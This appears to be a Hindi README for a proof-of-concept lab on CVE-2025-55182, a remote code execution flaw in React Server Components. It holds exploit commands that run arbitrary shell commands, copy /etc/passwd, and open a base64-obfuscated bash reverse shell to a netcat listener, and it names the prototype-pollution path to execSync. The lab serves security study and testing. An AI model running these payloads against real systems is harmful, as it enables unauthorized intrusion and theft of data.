
CVE-2025-55182 React2Shell PoC lab
React सर्वर घटकों में गंभीर भेद्यता CVE-2025-55182 को प्रदर्शित करने और परीक्षण करने के लिए एक व्यापक प्रयोगशाला।
यह रिपॉजिटरी इसके लिए अभिप्रेत है:
उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है। अनधिकृत पहुँच अवैध है।
✅ बिना प्रमाणीकरण के मनमाने कमांड निष्पादित करें
✅ सिस्टम फ़ाइलें पढ़ें
✅ फ़ाइलें बनाएं और संशोधित करें
✅ रिवर्स शेल कनेक्शन स्थापित करें
✅ पूर्ण सर्वर नियंत्रण प्राप्त करें
npm install --legacy-peer-deps
npm run dev
सर्वर http://localhost:3000 पर शुरू होगा
bash check-cve.sh
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"
# टर्मिनल 1 - श्रोता
nc -lvnp 4444
# टर्मिनल 2 - एक्सप्लॉइट
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"
├── app/ # भेद्य Next.js एप्लिकेशन
├── exploit/ # कार्यशील PoC एक्सप्लॉइट
│ └── rce_final.py # मुख्य एक्सप्लॉइट स्क्रिप्ट
├── check-cve.sh # स्वचालित भेद्यता जाँचकर्ता
├── package.json # भेद्य निर्भरताएँ
└── README.md
भेद्यता React सर्वर घटकों के पेलोड के डिसेरियलाइज़ेशन लॉजिक में मौजूद है। एक्सप्लॉइट process.mainModule.require('child_process').execSync() के माध्यम से मनमाना कोड निष्पादित करने के लिए प्रोटोटाइप प्रदूषण का लाभ उठाता है।
यह कोड केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उपयोगकर्ता किसी भी सिस्टम का परीक्षण करने से पहले उचित प्राधिकरण सुनिश्चित करने के लिए जिम्मेदार हैं। कंप्यूटर सिस्टम तक अनधिकृत पहुँच कंप्यूटर फ्रॉड और एब्यूज़ एक्ट (CFAA) और अन्य क्षेत्राधिकारों में समान कानूनों जैसे कानूनों के तहत अवैध है। लेखक इस जानकारी के दुरुपयोग के लिए कोई दायित्व नहीं मानता है।
इस प्रयोगशाला के माध्यम से काम करने के बाद, आप समझ जाएंगे: